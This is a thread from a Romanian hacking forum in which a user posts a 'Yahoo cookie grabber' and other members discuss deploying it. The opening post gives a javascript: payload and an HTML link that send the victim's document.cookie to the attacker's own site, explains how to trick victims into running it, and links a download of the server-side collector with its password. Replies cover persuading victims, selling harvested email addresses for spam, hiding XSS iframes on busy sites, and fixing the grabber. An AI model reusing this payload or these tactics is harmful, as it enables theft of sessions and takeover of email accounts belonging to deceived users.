Jump to content
Guest expl0iter

Yahoo Cookie Grabber [fara xss]

Recommended Posts

Guest expl0iter
Posted (edited)

Fara sa folosesti XSS

Daca tot nu este voie cu XSS-uri de yahoo pe rst, am gasit o metoda de a fura cookieuri si fara XSS :))

Acest grabber este pentru cei care nu au XSS, insa au putere maxima de a prosti lumea.

Dai acest cod la victima sa il bage in browser. [Tre sa ai putere de convingere foarte mare]

javascript:document.location='http://site-ul-tau.com/yahoo.php?ex='.concat(escape(document.cookie));  

Victima trebuie sa intre pe yahoo.com apoi sa bage in browser acel cod.

Nu am testat acest cod, dar incercati voi. Trimiteti un mail la un id de mess cu codul urmator:

<a href="javascript:document.location='http://site-ul-tau.com/yahoo.php?ex='.concat(escape(document.cookie));">CLICK</a>

Scriptul e gasit prin pc.

Daca gasiti metode de a baga acel script in browserul cuiva fara accesul persoanei repective, anuntati-ma si pe mine :))) sa nu mor prost :)

Oricum nu prea se pot face multe chestii.

vNjm1.png

http://i.imgur.com/vNjm1.png

Uploadati fisierele si creati un folder: /cookies

Download: Multiupload.com - upload your files to multiple file hosting sites!

Pass:rstcenter.com

Edited by expl0iter
Guest expl0iter
Posted
e faina ideea,poti sa faci cam o singura chestia cu asta,sa aduni emailuri apoi sa le vinzi presupun,daca ai un blog mare asa poti sa vezi clar cine se uita la blogul tau si are yahoo + ca strangi emails

Ce ma? Tu stii ce face un cookie grabber?:|

Ba, nu ia mailurile ci iti da access la mailul respectiv. Loooool:|

Posted (edited)

Am vrut sa ma uit si eu peste el dar nu ai mentionat nimic de parola.

Vreo alternativa pentru brute-force ?

//mersi

Edited by StrXt
Guest expl0iter
Posted
Am vrut sa ma uit si eu peste el dar nu ai mentionat nimic de parola.

Vreo alternativa pentru brute-force ?

Am dat EDIT. M-am grabit.

rstcenter.com e parola

Posted

Da koa' da cum pana mea il convingi pe mameluc sa copie codu ala in browser,cat de prost trebuie sa fie victimizatu'.Stiam de metoda asta demult, e mai veche ca victor ciorbea si nici n-am facut mare cacau cu ea, asa ca:

- SARBATORI FERICITE !

Guest expl0iter
Posted
Da koa' da cum pana mea il convingi pe mameluc sa copie codu ala in browser,cat de prost trebuie sa fie victimizatu'.

Asta deja nu este treaba mea... Eu am postat metoda.. Tu cauta o metoda ingenioasa.. inventeaza ceva :|. Incearca cu <a href="COD">xxx</a>. Nu am avut timp sa incerc eu

Posted (edited)

Merge metoda cu <a href= dar imi apare o eroare cand ma loghez pe hacked.php....

Warning: opendir(./cookies/) [function.opendir]: failed to open dir: No such file or directory in /home/a2822812/public_html/hacked.php on line 61

LAST EDIT:

Am rezolvat, mersi

Edited by mandeamarian
  • Moderators
Posted
Ce ma? Tu stii ce face un cookie grabber?:|

Ba, nu ia mailurile ci iti da access la mailul respectiv. Loooool:|

Poti pune un iframe cu xss-ul intr-un site cu multe vizite, iti faci o lista cu sute de mail-uri pe care le poti vinde pentru spam. Nu te mai impacienta asa, gandeste inainte sa scrii ceva.

Guest expl0iter
Posted
eu daca trimit mail cu <a href nu-mi pune linkul la textul respectiv, ci imi arata pur si simplu ce am scris. Gresesc cu ceva?

thx expl0iter pt "schema"!

Stiu asta.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...